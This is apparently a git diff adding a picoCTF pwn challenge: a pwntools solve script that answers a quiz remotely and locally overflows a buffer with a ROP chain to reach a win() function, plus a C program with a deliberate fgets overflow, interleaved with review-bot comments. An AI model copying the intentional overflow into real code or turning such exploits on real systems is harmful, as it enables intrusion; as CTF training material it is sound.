diff --git a/pwn/quizploit/flag.txt b/pwn/quizploit/flag.txt
new file mode 100644
index 0000000..7f34d3c
--- /dev/null
+++ b/pwn/quizploit/flag.txt
@@ -0,0 +1 @@
+picoCTF{dummy}
diff --git a/pwn/quizploit/solve.py b/pwn/quizploit/solve.py
new file mode 100755
index 0000000..6f8b33d
--- /dev/null
+++ b/pwn/quizploit/solve.py
@@ -0,0 +1,70 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "lonely-island.picoctf.net 54976".split()
+
+def conn() -> remote:
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def answers(r: remote) -> None:
+ print('Q1')
+ r.sendlineafter(b">> ", b"64-bit")
+ print('Q2')
+ r.sendlineafter(b">> ", b"dynamic")
+ print('Q3')
+ r.sendlineafter(b">> ", b"not stripped")
+ print('Q4')
+ r.sendlineafter(b">> ", b"0x15")
+ print('Q5')
+ r.sendlineafter(b">> ", b"0x90")
+ print('Q6')
+ r.sendlineafter(b">> ", b"yes")
+ print('Q7')
+ r.sendlineafter(b">> ", b"fgets")
+ print('Q8')
+ r.sendlineafter(b">> ", b"win")
+ print('Q9')
+ r.sendlineafter(b">> ", b"buffer overflow")
+ print('Q10')
+ r.sendlineafter(b">> ", hex(0x90 - 0x15).encode())
+ print('Q11')
+ r.sendlineafter(b">> ", b"NX")
+ print('Q12')
+ r.sendlineafter(b">> ", b"ROP")
+ print('Q13')
+ r.sendlineafter(b">> ", hex(exe.symbols['win']).encode())
+ print('Q14')
+ result = r.recvline_contains(b"picoCTF{").decode().strip()
+ print(result)
+ r.close()
+
+def main() -> None:
+
+ r = conn()
+ if args.REMOTE:
+ answers(r)
+ else:
+ offset = 40
+
+ rop = ROP(exe)
+ rop.raw(rop.generatePadding(0, offset))
+ rop.raw(rop.ret.address)
+ rop.win()
+ r.sendline(rop.chain())
+
+ print(r.recvall().decode(), end='')
+ r.close()
+
+if __name__ == "__main__":
+ main()
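Review bot: `answers()` closes the tube it was handed (`r.close()` at its end), yet `main()` goes on to call `r.recvall()` and `r.close()` on the same object in the REMOTE path; whether that is harmless depends on pwntools tolerating recv and close on an already-closed socket, which this hunk does not show. Let `main()` own the connection's lifetime: drop the `r.close()` from `answers()` and keep the single close at the end of `main()`. The `conn() -> remote` annotation is also wrong for the local branch, which returns a `process`; the common base class `pwnlib.tubes.tube.tube` fits both. Separately, `r.recvall().decode()` raises `UnicodeDecodeError` on any non-UTF-8 byte in the service's output, so `.decode(errors="replace")` keeps the final printout from aborting.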
diff --git a/pwn/quizploit/vuln b/pwn/quizploit/vuln
new file mode 100755
index 0000000..41bc8d1
Binary files /dev/null and b/pwn/quizploit/vuln differ
diff --git a/pwn/quizploit/vuln.c b/pwn/quizploit/vuln.c
new file mode 100644
index 0000000..eb5c82f
--- /dev/null
+++ b/pwn/quizploit/vuln.c
@@ -0,0 +1,24 @@
+#include
+#include
+
+/*
+This is not the challenge, just a template to answer the questions.
+To get the flag, answer all the questions.
+There are no bugs in the quiz.
+There are 0xD questions in total.
+
+*/
+
+void win(){
+ system("cat flag.txt");
+}
+
+void vuln(){
+ char buffer[0x15] = {0};
+ fprintf(stdout, "\nEnter payload: ");
+ fgets(buffer, 0x90, stdin);
+}
+
+void main(){
+ vuln();
+}
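Review bot: The two `#include` lines in this hunk carry no header name, presumably `<stdio.h>` and `<stdlib.h>` lost when the page was rendered; as shown the file does not compile, so the committed source is worth confirming. The header comment says the file is a template rather than the challenge, but it never states that `fgets(buffer, 0x90, stdin)` reading up to 0x8F bytes into the 0x15-byte `buffer` is deliberate, so a reader may take the size mismatch for an oversight; a one-line comment such as `/* intentional: read length exceeds sizeof buffer; this mismatch is what the quiz asks about */` keeps that explicit. `void main()` is not a conforming signature; `int main(void)` with `return 0;` is the portable form. `system("cat flag.txt")` also resolves `flag.txt` against the process's working directory, so the local run in solve.py only finds it when launched from the challenge directory.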